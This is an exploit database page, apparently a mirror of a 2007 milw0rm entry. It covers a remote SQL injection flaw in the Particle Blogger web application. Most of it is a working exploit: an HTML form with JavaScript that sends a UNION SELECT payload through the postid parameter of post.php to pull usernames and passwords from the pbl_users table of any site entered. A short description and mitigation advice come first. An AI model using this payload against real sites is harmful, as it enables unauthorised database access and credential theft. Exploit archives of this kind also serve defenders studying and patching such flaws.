header-logo
Suggest Exploit
vendor:
Particle Blogger
by:
UniquE-Key{UniquE-Cracker}
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Particle Blogger
Affected Version From: Particle Blogger 1.0.0
Affected Version To: Particle Blogger 1.2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on Particle Blogger's post.php file. By manipulating the 'postid' parameter, an attacker can retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Users should also ensure they are using the latest version of Particle Blogger that has the necessary security patches.
Source

Exploit-DB raw data:

<!--

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-16}

Product / Vendor :

Particle Soft

http://blogger.particlesoft.net/

Bug :

http://localhost/script/post.php?postid=-SQL Inj-

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :

-->

<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>
<body bgcolor="#000000">
<script language="JavaScript">
function ps() {
  {
    unique.action=""+document.unique.site.value+"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*";
    unique.submit();
  }
}
</script>
<center><font face="Verdana" size="2" color="#FF0000"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</b></font></center>
<form name="unique" method="POST" onsubmit="ps();">
<center><font face="Arial" size="2" color="#00FF00">Site Address :</td></center><br>
<center><input type="text" name="site" value="http://localhost/script" size="44" class="unique" class="inputbox"></center><br>
<center><input type="submit" value="Apply" class="unique"></center><br>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

<!--

Tested :

Particle Blogger 1.1.2

Vulnerable :

Particle Blogger 1.2.0

Particle Blogger 1.1.2

Particle Blogger 1.1.1

Particle Blogger 1.1.0

Particle Blogger 1.0.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-->

# milw0rm.com [2007-03-16]

Navigation

Suggest Exploit

Services By CQR